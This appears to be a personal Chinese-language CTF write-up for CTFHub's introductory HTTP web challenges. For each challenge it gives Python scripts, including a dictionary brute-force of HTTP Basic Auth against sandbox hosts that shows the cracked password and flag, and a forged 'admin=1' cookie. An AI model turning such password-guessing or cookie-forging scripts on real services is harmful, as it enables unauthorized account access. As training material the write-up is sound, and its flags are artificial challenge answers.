目錄
個人題解記錄,不喜勿噴
Web前置技能
一、HTTP協議
1、基礎認證
在HTTP中,基本認證(英語:Basic access authentication)是允許http用戶代理(如:網頁瀏覽器)在請求時,提供`用戶名` 和`密碼`的一種方式。詳情請查看 https://zh.wikipedia.org/wiki/HTTP基本認證
直接上腳本
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -- author : valecalida --
# edit_time: 2020/3/19 下午6:43
from urllib.request import HTTPBasicAuthHandler, build_opener, HTTPPasswordMgrWithDefaultRealm
from urllib.error import URLError
username = 'admin'
f = open('10_million_password_list_top_100.txt', 'r')
url = "http://challenge-b14d74b2bbccc186.sandbox.ctfhub.com:10080/flag.html"
for line in f.readlines():
password = line.strip()
instance = HTTPPasswordMgrWithDefaultRealm()
instance.add_password(None, url, username, password)
auth_handler = HTTPBasicAuthHandler(instance)
opener = build_opener(auth_handler)
try:
res = opener.open(url)
html = res.read().decode('utf-8')
print("用戶名:admin 密碼:%s" % password, "是正確答案")
print("flag爲:", html)
break
except URLError as e :
print("用戶名:admin 密碼:%s" % password, "不是正確答案,原因是:", e.reason)
f.close()
這裏爲了直觀的看到密碼,我這裏打印了一下,不然可以不打印
運行結果是
用戶名:admin 密碼:123456 不是正確答案,原因是: Unauthorized
用戶名:admin 密碼:password 不是正確答案,原因是: Unauthorized
·
·
·
省
略
很
多
行
·
·
·
用戶名:admin 密碼:andrew 不是正確答案,原因是: Unauthorized
用戶名:admin 密碼:tigger 是正確答案
flag爲: ctfhub{e33b1ac90d8205e95a7dc326726cd1ffe080c673}
或者使用下面這個腳本也可以
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -- author : valecalida --
# edit_time: 2020/3/20 下午2:27
import requests
from requests.auth import HTTPBasicAuth
username = 'admin'
f = open('10_million_password_list_top_100.txt', 'r')
url = "http://challenge-8d232fa7f09a8d27.sandbox.ctfhub.com:10080/flag.html"
for line in f.readlines():
password = line.strip()
res = requests.get(url=url, auth = HTTPBasicAuth(username, password))
if res.status_code == 200:
print(res.text)
break
# else:
# continue
2、302跳轉
#!/usr/bin/python
# -*- coding: utf-8 -*-
# -- author : valecalida --
import requests
url = "http://challenge-061acc63c590e9b4.sandbox.ctfhub.com:10080/index.php"
r = requests.get(url,allow_redirects=False)
print(r.text)
3、Cookie
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
import urllib.request
url = "http://challenge-dd1412b01a02d5dd.sandbox.ctfhub.com:10080/"
header = {
"Cookie": "admin=1"
}
req = urllib.request.Request(url, headers=header, method="GET")
res = urllib.request.urlopen(req)
print(res.read().decode('utf-8'))
4、請求方式
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
# Edit time: 2020/3/19 19:59
from urllib import request
import re
"""
HTTP Method is GET
Use CTF**B Method, I will give you flag.
Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php.
"""
rr = re.compile(r'\bctfhub{.*}', re.I)
url = "http://challenge-c2631c2870dc91e1.sandbox.ctfhub.com:10080/index.php"
req = request.Request(url=url, method="CTFHUB")
res = request.urlopen(req)
print(rr.findall(res.read().decode('utf-8'))[0])
5、響應包源代碼
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# --author:valecalida--
# Edit time: 2020/3/19 20:56
import re
import urllib.request
rr = re.compile(r'\bctfhub{.*}', re.I)
url = "http://challenge-226bf952c446eb7c.sandbox.ctfhub.com:10080/"
res = urllib.request.urlopen(url)
print(rr.findall(res.read().decode('utf-8'))[0])
未完待續~~